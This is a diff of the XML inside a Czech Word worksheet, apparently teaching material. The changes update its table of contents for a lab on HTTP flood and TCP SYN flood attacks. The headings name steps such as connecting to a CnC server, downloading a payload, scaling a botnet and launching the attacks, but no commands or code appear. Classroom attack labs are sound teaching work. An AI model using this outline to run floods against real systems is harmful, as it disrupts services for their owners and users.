+++ b/~~Dlouhodobka~~/DOCX/Pracovni_list_smekama.docx
@@ -123,25 +123,9 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc192341151"/>
-      <w:r>
-        <w:t xml:space="preserve">Pracovní list – Scénáře na HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a TCP SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> útoky</w:t>
+      <w:bookmarkStart w:id="0" w:name="_Toc192867805"/>
+      <w:r>
+        <w:t>Pracovní list – Scénáře na HTTP flood a TCP SYN flood útoky</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
@@ -198,7 +182,7 @@
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc192341151" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867805" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -225,7 +209,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341151 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867805 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -267,7 +251,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341152" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867806" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -294,7 +278,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341152 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867806 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -314,7 +298,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>1</w:t>
+          <w:t>2</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -336,7 +320,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341153" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867807" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -363,7 +347,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341153 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867807 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -405,7 +389,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341154" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867808" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -432,7 +416,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341154 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867808 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -452,7 +436,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>2</w:t>
+          <w:t>3</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -474,7 +458,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341155" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867809" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -501,7 +485,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341155 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867809 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -521,7 +505,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>2</w:t>
+          <w:t>3</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -543,7 +527,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341156" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867810" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -570,7 +554,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341156 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867810 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -590,7 +574,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>2</w:t>
+          <w:t>3</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -612,7 +596,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341157" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867811" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
@@ -639,7 +623,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341157 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867811 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -659,7 +643,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>3</w:t>
+          <w:t>4</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -681,13 +665,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341158" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867812" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Část 1. Úvod k DoS</w:t>
+          <w:t>Část 1. Popis topologie</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -708,7 +692,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341158 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867812 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -728,7 +712,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>3</w:t>
+          <w:t>4</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -750,13 +734,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341159" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867813" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Část 2. Popis topologie</w:t>
+          <w:t>Část 1. – pokračování - replikace topologie (jen zajímavost)</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -777,7 +761,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341159 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867813 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -797,7 +781,214 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>3</w:t>
+          <w:t>5</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867814" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 1. Stáhnutí a virtualizace strojů</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867814 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>5</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867815" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 2. Nastavení síťových karet ve VB</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867815 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>5</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867816" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 3. Komunikace (routery)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867816 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>6</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -819,13 +1010,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341160" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867817" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Část 2,5. Replikace topologie (pro přednášející)</w:t>
+          <w:t>Část 2. Příprava scénářů</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -846,7 +1037,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341160 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867817 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -866,7 +1057,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>4</w:t>
+          <w:t>8</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -888,13 +1079,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341161" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867818" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Krok 1. Stáhnutí a virtualizace strojů</w:t>
+          <w:t>Krok 1. Připojení na CnC server</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -915,7 +1106,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341161 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867818 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -935,7 +1126,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>4</w:t>
+          <w:t>8</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -957,13 +1148,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341162" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867819" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Krok 2. Nastavení síťových karet ve VB</w:t>
+          <w:t>Krok 2. Stahování payload souboru na CnC server</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -984,7 +1175,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341162 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867819 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1004,7 +1195,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>4</w:t>
+          <w:t>9</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1026,13 +1217,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341163" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867820" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Krok 3. Komunikace (routery)</w:t>
+          <w:t>Krok 3. Zkouška funkčnosti prvků</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1053,7 +1244,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341163 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867820 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1073,7 +1264,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>5</w:t>
+          <w:t>10</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1095,13 +1286,13 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink w:anchor="_Toc192341164" w:history="1">
+      <w:hyperlink w:anchor="_Toc192867821" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hypertextovodkaz"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Část 3.</w:t>
+          <w:t>Část 3. Scénář HTTP flood</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1122,7 +1313,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc192341164 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867821 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1142,7 +1333,421 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:t>7</w:t>
+          <w:t>12</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867822" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 1. Spuštění útoku</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867822 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>12</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867823" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 2. Škálování botnetu</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867823 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>14</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867824" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 3. Útok a jeho dopad</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867824 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>15</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah2"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867825" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Část 4. Scénář TCP SYN flood</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867825 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>16</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867826" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 1. Kontrola a příprava</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867826 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>16</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Obsah3"/>
+        <w:tabs>
+          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc192867827" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Krok 2. Útok a jeho dopad</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc192867827 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>16</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -1164,6 +1769,7 @@
           <w:b w:val="0"/>
           <w:sz w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
     </w:p>
